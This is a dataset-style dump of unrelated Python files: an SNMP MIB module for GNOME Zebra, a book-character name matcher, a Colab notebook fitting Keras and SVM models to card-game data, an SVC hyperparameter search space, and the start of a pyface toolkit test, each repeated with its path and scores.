ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Integer32, TimeTicks, Counter32, Counter64, MibIdentifier, Bits, iso, IpAddress, ObjectIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Integer32", "TimeTicks", "Counter32", "Counter64", "MibIdentifier", "Bits", "iso", "IpAddress", "ObjectIdentity", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
zebra = ModuleIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2))
if mibBuilder.loadTexts: zebra.setLastUpdated('200004250000Z')
if mibBuilder.loadTexts: zebra.setOrganization('GNOME project')
zserv = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 1))
if mibBuilder.loadTexts: zserv.setStatus('current')
bgpd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 2))
if mibBuilder.loadTexts: bgpd.setStatus('current')
ripd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 3))
if mibBuilder.loadTexts: ripd.setStatus('current')
ripngd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 4))
if mibBuilder.loadTexts: ripngd.setStatus('current')
ospfd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 5))
if mibBuilder.loadTexts: ospfd.setStatus('current')
ospf6d = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 6))
if mibBuilder.loadTexts: ospf6d.setStatus('current')
mibBuilder.exportSymbols("GNOME-PRODUCT-ZEBRA-MIB", ospf6d=ospf6d, PYSNMP_MODULE_ID=zebra, ripngd=ripngd, bgpd=bgpd, zserv=zserv, ripd=ripd, zebra=zebra, ospfd=ospfd) | pysnmp/GNOME-PRODUCT-ZEBRA-MIB.py | OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint")
gnomeProducts, = mibBuilder.importSymbols("GNOME-SMI", "gnomeProducts")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Integer32, TimeTicks, Counter32, Counter64, MibIdentifier, Bits, iso, IpAddress, ObjectIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Integer32", "TimeTicks", "Counter32", "Counter64", "MibIdentifier", "Bits", "iso", "IpAddress", "ObjectIdentity", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
zebra = ModuleIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2))
if mibBuilder.loadTexts: zebra.setLastUpdated('200004250000Z')
if mibBuilder.loadTexts: zebra.setOrganization('GNOME project')
zserv = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 1))
if mibBuilder.loadTexts: zserv.setStatus('current')
bgpd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 2))
if mibBuilder.loadTexts: bgpd.setStatus('current')
ripd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 3))
if mibBuilder.loadTexts: ripd.setStatus('current')
ripngd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 4))
if mibBuilder.loadTexts: ripngd.setStatus('current')
ospfd = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 5))
if mibBuilder.loadTexts: ospfd.setStatus('current')
ospf6d = ObjectIdentity((1, 3, 6, 1, 4, 1, 3319, 1, 2, 6))
if mibBuilder.loadTexts: ospf6d.setStatus('current')
mibBuilder.exportSymbols("GNOME-PRODUCT-ZEBRA-MIB", ospf6d=ospf6d, PYSNMP_MODULE_ID=zebra, ripngd=ripngd, bgpd=bgpd, zserv=zserv, ripd=ripd, zebra=zebra, ospfd=ospfd) | 0.358915 | 0.107017 |
class Character:
"""
Represents a Character with it's aliases and alternative spellings during the books
"""
def __init__(self, ref_name: str, alt_names: list):
"""
:param ref_name: reference name of the Character (displayed in figures, for example)
:param alt_names: list of alternative names and aliases for the Character
"""
self.ref_name = ref_name
self.alt_names = [name for name in alt_names]
def appearance_indices(self, words: list) -> list:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
indices = []
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
if bigram in self.alt_names:
idx = index + 1
if trigram in self.alt_names:
idx = index + 2
indices.append(idx)
index = idx + 1
return indices
def appears_in(self, words: list) -> bool:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
return True
index = idx + 1
return False
def __repr__(self):
return self.ref_name | src/object/Character.py | class Character:
"""
Represents a Character with it's aliases and alternative spellings during the books
"""
def __init__(self, ref_name: str, alt_names: list):
"""
:param ref_name: reference name of the Character (displayed in figures, for example)
:param alt_names: list of alternative names and aliases for the Character
"""
self.ref_name = ref_name
self.alt_names = [name for name in alt_names]
def appearance_indices(self, words: list) -> list:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
indices = []
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
if bigram in self.alt_names:
idx = index + 1
if trigram in self.alt_names:
idx = index + 2
indices.append(idx)
index = idx + 1
return indices
def appears_in(self, words: list) -> bool:
"""
Lists all indices that mark the characters appearance in the given bag of words.
:param words: bag of words to look up the character name in.
:return: list of indices that mark the appearance of the characters name
"""
index = 0
while len(words) > index:
idx = index
bigram = ' '.join(words[index:index + 1])
trigram = ' '.join(words[index:index + 2])
if words[idx] in self.alt_names or bigram in self.alt_names or trigram in self.alt_names:
return True
index = idx + 1
return False
def __repr__(self):
return self.ref_name | 0.85186 | 0.700914 |
from google.colab import drive
drive.mount('/content/gdrive/')
import os
import datetime
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler, TensorBoard
# Data generator
class DataGenerator(tf.keras.utils.Sequence):
'Generates data for tf.keras'
def __init__(self, batch_size = 64, shuffle = True, datasettype = 'train', permFreq = 0.15, output_type = 'win'):
'Initialization'
self.datasettype = datasettype
if datasettype == 'train':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/train.csv'
elif datasettype == 'val':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/val.csv'
elif datasettype == 'test':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/test.csv'
else:
print("Incorrect datatype")
self.xy = np.loadtxt(self.link, delimiter = ",", dtype = np.float32, skiprows = 1)
np.random.shuffle(self.xy) # Shuffle dataset
self.y = self.xy[:, [0]]
self.f = self.xy[:, 1:6]
self.x = self.xy[:, 6:58]
self.x = self.x.reshape((-1,4,13,1))
self.g = self.xy[:, 58:184]
self.o = self.xy[:, 184:236]
self.o = self.o.reshape((-1,4,13,1))
self.dim = (4,13)
self.batch_size = batch_size
self.shuffle = shuffle
self.indexes = np.arange(self.xy.shape[0])
self.on_epoch_end()
self.permFreq = permFreq
self.output_type = output_type
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.xy.shape[0] / self.batch_size))
def __getitem__(self, index_batch):
'Generate one batch of data'
# Generate indexes of the batch
indexes_batch = self.indexes[index_batch*self.batch_size:(index_batch+1)*self.batch_size]
# Generate data
[x, f, g, o], y = self.__data_generation(indexes_batch)
return [x, f, g, o], y
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, indexes):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
x = np.empty((self.batch_size, 4,13,1))
f = np.empty((self.batch_size, 5))
g = np.empty((self.batch_size, 126))
o = np.empty((self.batch_size, 4,13,1))
y = np.empty((self.batch_size))
# Generate data
for i, index in enumerate(indexes):
# Random permutation for x and o
r = random.random()
if r < (1-self.permFreq):
x[i,] = self.x[index,]
o[i,] = self.o[index,]
else:
x[i,] = np.array([np.random.permutation(self.x[index,0,])])
o[i,] = np.array([np.random.permutation(self.o[index,0,])])
# f and g
f[i,] = self.f[index,]
g[i,] = self.g[index,]
# output type
if self.output_type == 'win':
if self.y[index,] > 0:
y[i ] = 1
else:
y[i ] = 0
elif self.output_type == 'score':
y[i ] = self.y[index,]
else:
print('Invalid input type')
return [x, f, g, o], y
# TensorBoard
log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = log_dir, histogram_freq = 1)
# Checkpoint callback
checkpoint_path = "gdrive/My Drive/Colab Notebooks/GR-TrainModel/Checkpoint/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1,
save_freq = 'epoch')
# Step Decay
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule)
schedule = step_decay_schedule(initial_lr = 0.001, decay_factor=0.1, step_size = 50)
# Data generator
train_generator = DataGenerator(datasettype = 'train', batch_size = 128, permFreq = 0, output_type = 'score')
valid_generator = DataGenerator(datasettype = 'val', batch_size = 128, permFreq = 0, output_type = 'score')
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (5,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
# x1 = Flatten(name = 'xflatten')(x)
# o1 = Flatten(name = 'oflatten')(o)
# i = concatenate([x1, f, g, o1], name = 'concat')
y = Dense(1, name = 'y')(f)
model = Model(inputs = [x, f, g, o], outputs = y)
# model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
model.compile(loss = 'mse', optimizer = 'adam')
return model
# Commented out IPython magic to ensure Python compatibility.
!rm -rf ./logs/
# %load_ext tensorboard
# %tensorboard --logdir logs/fit
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = train_generator,
validation_data = valid_generator,
epochs = 10,
callbacks = [cp_callback, schedule, tensorboard_callback])
test_generator = DataGenerator(datasettype = 'test', batch_size = 128, permFreq = 0, output_type = 'score')
NN.evaluate(test_generator)
"""# **Other model**"""
import matplotlib.pyplot as plt
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
geo = data.iloc[:,58:184]
sumgeo = geo.sum(axis = 1)
sumgeo = np.array(sumgeo).reshape(-1,1)
deadwood = data.Deadwood0
deadwood = np.array(deadwood).reshape(-1,1)
X = np.concatenate((sumgeo,deadwood),axis=1)
model = svm.SVC(probability=True)
model.fit(X, Y)
testDeadwood = np.arange(0, 100)
testDeadwood = testDeadwood.reshape(-1,1)
testGeo = np.full((100, 1), 5, dtype=int)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testDeadwood, testY)
testDeadwood = np.full((40, 1), 15, dtype=int)
testGeo = np.arange(0, 40)
testGeo = testGeo.reshape(-1,1)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testGeo, testY)
from sklearn import svm
X = data.Deadwood0
Y = data.win
X = np.array(X).reshape(-1, 1)
model = svm.SVC(probability=True)
model.fit(X, Y)
Yhat = model.predict(X)
1 - sum(Yhat - Y)/16317
testX = np.arange(0, 100)
testX = testX.reshape(-1,1)
testY = model.predict(testX)
model.predict_proba(testX)
plt.plot(testX, testY)
plt.scatter(X, Y)
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
data
data.describe()
corr_matrix = data.corr()
a = corr_matrix['win']
print(a.sort_values().index)
for i in a.sort_values():
print(i)
import matplotlib.pyplot as plt
plt.figure(figsize=(60,7))
plt.plot(a)
import seaborn as sn
sn.heatmap(a, annot=True)
plt.show()
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/1M_Simple_All_OHE_noDup_ISRU_geo_val.csv')
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
y = np.array(data.win)
y
# f = np.array(data[['GamestateNum', 'RunNum0', 'SetNum0', 'Deadwood0', 'Hitscore0']])
f = np.array(data[['Deadwood0']])
data
f
y
y = y.reshape((-1,1))
model = svm.SVC(probability=True)
model.fit(f, y)
def DualInception():
f = Input(shape = (1,), name = 'f')
h = Dense(8, activation = 'sigmoid', name = 'h')(f)
y = Dense(1, activation = 'sigmoid', name = 'y')(h)
model = Model(inputs = f, outputs = y)
model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
return model
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = f,
y = y,
epochs = 10)
test.columns
GamestateNumTest = np.full((100, 1), 5, dtype=int)
RunNum0Test = np.full((100, 1), 1, dtype=int)
SetNum0Test = np.full((100, 1), 1, dtype=int)
Deadwood0Test = np.arange(0, 100)
Deadwood0Test = Deadwood0Test.reshape(-1,1)
Hitscore0Test = np.full((100, 1), 10, dtype=int)
testX = np.concatenate((GamestateNumTest, RunNum0Test, SetNum0Test, Deadwood0Test, Hitscore0Test), axis=1)
testY = NN.predict(testX)
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/2M_Simple_All_OHE_randomplayer_nodup_ISRU_geo.csv')
data.describe()
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
plt.figure(figsize=(15,7))
plt.scatter(data2.Deadwood0, data2.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Deadwood0, data.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Hitscore0, data.score0_mean) | results/SimpleLast/main2_LinearReg.py | from google.colab import drive
drive.mount('/content/gdrive/')
import os
import datetime
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler, TensorBoard
# Data generator
class DataGenerator(tf.keras.utils.Sequence):
'Generates data for tf.keras'
def __init__(self, batch_size = 64, shuffle = True, datasettype = 'train', permFreq = 0.15, output_type = 'win'):
'Initialization'
self.datasettype = datasettype
if datasettype == 'train':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/train.csv'
elif datasettype == 'val':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/val.csv'
elif datasettype == 'test':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/test.csv'
else:
print("Incorrect datatype")
self.xy = np.loadtxt(self.link, delimiter = ",", dtype = np.float32, skiprows = 1)
np.random.shuffle(self.xy) # Shuffle dataset
self.y = self.xy[:, [0]]
self.f = self.xy[:, 1:6]
self.x = self.xy[:, 6:58]
self.x = self.x.reshape((-1,4,13,1))
self.g = self.xy[:, 58:184]
self.o = self.xy[:, 184:236]
self.o = self.o.reshape((-1,4,13,1))
self.dim = (4,13)
self.batch_size = batch_size
self.shuffle = shuffle
self.indexes = np.arange(self.xy.shape[0])
self.on_epoch_end()
self.permFreq = permFreq
self.output_type = output_type
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.xy.shape[0] / self.batch_size))
def __getitem__(self, index_batch):
'Generate one batch of data'
# Generate indexes of the batch
indexes_batch = self.indexes[index_batch*self.batch_size:(index_batch+1)*self.batch_size]
# Generate data
[x, f, g, o], y = self.__data_generation(indexes_batch)
return [x, f, g, o], y
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, indexes):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
x = np.empty((self.batch_size, 4,13,1))
f = np.empty((self.batch_size, 5))
g = np.empty((self.batch_size, 126))
o = np.empty((self.batch_size, 4,13,1))
y = np.empty((self.batch_size))
# Generate data
for i, index in enumerate(indexes):
# Random permutation for x and o
r = random.random()
if r < (1-self.permFreq):
x[i,] = self.x[index,]
o[i,] = self.o[index,]
else:
x[i,] = np.array([np.random.permutation(self.x[index,0,])])
o[i,] = np.array([np.random.permutation(self.o[index,0,])])
# f and g
f[i,] = self.f[index,]
g[i,] = self.g[index,]
# output type
if self.output_type == 'win':
if self.y[index,] > 0:
y[i ] = 1
else:
y[i ] = 0
elif self.output_type == 'score':
y[i ] = self.y[index,]
else:
print('Invalid input type')
return [x, f, g, o], y
# TensorBoard
log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = log_dir, histogram_freq = 1)
# Checkpoint callback
checkpoint_path = "gdrive/My Drive/Colab Notebooks/GR-TrainModel/Checkpoint/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1,
save_freq = 'epoch')
# Step Decay
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule)
schedule = step_decay_schedule(initial_lr = 0.001, decay_factor=0.1, step_size = 50)
# Data generator
train_generator = DataGenerator(datasettype = 'train', batch_size = 128, permFreq = 0, output_type = 'score')
valid_generator = DataGenerator(datasettype = 'val', batch_size = 128, permFreq = 0, output_type = 'score')
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (5,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
# x1 = Flatten(name = 'xflatten')(x)
# o1 = Flatten(name = 'oflatten')(o)
# i = concatenate([x1, f, g, o1], name = 'concat')
y = Dense(1, name = 'y')(f)
model = Model(inputs = [x, f, g, o], outputs = y)
# model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
model.compile(loss = 'mse', optimizer = 'adam')
return model
# Commented out IPython magic to ensure Python compatibility.
!rm -rf ./logs/
# %load_ext tensorboard
# %tensorboard --logdir logs/fit
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = train_generator,
validation_data = valid_generator,
epochs = 10,
callbacks = [cp_callback, schedule, tensorboard_callback])
test_generator = DataGenerator(datasettype = 'test', batch_size = 128, permFreq = 0, output_type = 'score')
NN.evaluate(test_generator)
"""# **Other model**"""
import matplotlib.pyplot as plt
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
geo = data.iloc[:,58:184]
sumgeo = geo.sum(axis = 1)
sumgeo = np.array(sumgeo).reshape(-1,1)
deadwood = data.Deadwood0
deadwood = np.array(deadwood).reshape(-1,1)
X = np.concatenate((sumgeo,deadwood),axis=1)
model = svm.SVC(probability=True)
model.fit(X, Y)
testDeadwood = np.arange(0, 100)
testDeadwood = testDeadwood.reshape(-1,1)
testGeo = np.full((100, 1), 5, dtype=int)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testDeadwood, testY)
testDeadwood = np.full((40, 1), 15, dtype=int)
testGeo = np.arange(0, 40)
testGeo = testGeo.reshape(-1,1)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testGeo, testY)
from sklearn import svm
X = data.Deadwood0
Y = data.win
X = np.array(X).reshape(-1, 1)
model = svm.SVC(probability=True)
model.fit(X, Y)
Yhat = model.predict(X)
1 - sum(Yhat - Y)/16317
testX = np.arange(0, 100)
testX = testX.reshape(-1,1)
testY = model.predict(testX)
model.predict_proba(testX)
plt.plot(testX, testY)
plt.scatter(X, Y)
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
data
data.describe()
corr_matrix = data.corr()
a = corr_matrix['win']
print(a.sort_values().index)
for i in a.sort_values():
print(i)
import matplotlib.pyplot as plt
plt.figure(figsize=(60,7))
plt.plot(a)
import seaborn as sn
sn.heatmap(a, annot=True)
plt.show()
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/1M_Simple_All_OHE_noDup_ISRU_geo_val.csv')
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
y = np.array(data.win)
y
# f = np.array(data[['GamestateNum', 'RunNum0', 'SetNum0', 'Deadwood0', 'Hitscore0']])
f = np.array(data[['Deadwood0']])
data
f
y
y = y.reshape((-1,1))
model = svm.SVC(probability=True)
model.fit(f, y)
def DualInception():
f = Input(shape = (1,), name = 'f')
h = Dense(8, activation = 'sigmoid', name = 'h')(f)
y = Dense(1, activation = 'sigmoid', name = 'y')(h)
model = Model(inputs = f, outputs = y)
model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
return model
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = f,
y = y,
epochs = 10)
test.columns
GamestateNumTest = np.full((100, 1), 5, dtype=int)
RunNum0Test = np.full((100, 1), 1, dtype=int)
SetNum0Test = np.full((100, 1), 1, dtype=int)
Deadwood0Test = np.arange(0, 100)
Deadwood0Test = Deadwood0Test.reshape(-1,1)
Hitscore0Test = np.full((100, 1), 10, dtype=int)
testX = np.concatenate((GamestateNumTest, RunNum0Test, SetNum0Test, Deadwood0Test, Hitscore0Test), axis=1)
testY = NN.predict(testX)
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/2M_Simple_All_OHE_randomplayer_nodup_ISRU_geo.csv')
data.describe()
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
plt.figure(figsize=(15,7))
plt.scatter(data2.Deadwood0, data2.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Deadwood0, data.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Hitscore0, data.score0_mean) | 0.693265 | 0.29022 |
import ConfigSpace
def get_hyperparameter_search_space_small(seed):
"""
Small version of svm config space, featuring important hyperparameters
based on https://arxiv.org/abs/1710.04725
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
C = ConfigSpace.UniformFloatHyperparameter(
name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
kernel = ConfigSpace.CategoricalHyperparameter(
name='svc__kernel', choices=['rbf', 'poly', 'sigmoid'], default_value='rbf')
degree = ConfigSpace.UniformIntegerHyperparameter(
name='svc__degree', lower=1, upper=5, default_value=3)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
coef0 = ConfigSpace.UniformFloatHyperparameter(
name='svc__coef0', lower=-1, upper=1, default_value=0)
cs.add_hyperparameters([
C,
kernel,
degree,
gamma,
coef0
])
degree_depends_on_poly = ConfigSpace.EqualsCondition(degree, kernel, 'poly')
coef0_condition = ConfigSpace.InCondition(coef0, kernel, ['poly', 'sigmoid'])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
def get_hyperparameter_search_space_micro(seed):
"""
Small version of svm config space, featuring important hyperparameters
as used by:
http://metalearning.ml/2018/papers/metalearn2018_paper70.pdf
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')
C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
cs.add_hyperparameters([
kernel,
C,
gamma
])
return cs | openmldefaults/config_spaces/svc.py | import ConfigSpace
def get_hyperparameter_search_space_small(seed):
"""
Small version of svm config space, featuring important hyperparameters
based on https://arxiv.org/abs/1710.04725
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
C = ConfigSpace.UniformFloatHyperparameter(
name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
kernel = ConfigSpace.CategoricalHyperparameter(
name='svc__kernel', choices=['rbf', 'poly', 'sigmoid'], default_value='rbf')
degree = ConfigSpace.UniformIntegerHyperparameter(
name='svc__degree', lower=1, upper=5, default_value=3)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
coef0 = ConfigSpace.UniformFloatHyperparameter(
name='svc__coef0', lower=-1, upper=1, default_value=0)
cs.add_hyperparameters([
C,
kernel,
degree,
gamma,
coef0
])
degree_depends_on_poly = ConfigSpace.EqualsCondition(degree, kernel, 'poly')
coef0_condition = ConfigSpace.InCondition(coef0, kernel, ['poly', 'sigmoid'])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
def get_hyperparameter_search_space_micro(seed):
"""
Small version of svm config space, featuring important hyperparameters
as used by:
http://metalearning.ml/2018/papers/metalearn2018_paper70.pdf
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')
C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
cs.add_hyperparameters([
kernel,
C,
gamma
])
return cs | 0.870556 | 0.382891 |
import pkg_resources
import unittest
import pyface.toolkit
class TestToolkit(unittest.TestCase):
def test_missing_import(self):
# test that we get an undefined object if no toolkit implementation
cls = pyface.toolkit.toolkit_object('tests:Missing')
with self.assertRaises(NotImplementedError):
obj = cls()
def test_bad_import(self):
# test that we don't filter unrelated import errors
with self.assertRaises(ImportError):
cls = pyface.toolkit.toolkit_object('tests.bad_import:Missing')
def test_core_plugins(self):
# test that we can see appropriate core entrypoints
plugins = set(entry_point.name for entry_point in
pkg_resources.iter_entry_points('pyface.toolkits'))
self.assertLessEqual({'qt4', 'wx', 'qt', 'null'}, plugins)
def test_toolkit_object(self):
# test that the Toolkit class works as expected
# note that if this fails many other things will too
from pyface.tests.test_new_toolkit.init import toolkit_object
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
def test_toolkit_object_overriden(self):
# test that the Toolkit class search paths can be overridden
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
toolkit_object = pyface.toolkit.toolkit_object
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
finally:
toolkit_object.packages = old_packages
def test_toolkit_object_not_overriden(self):
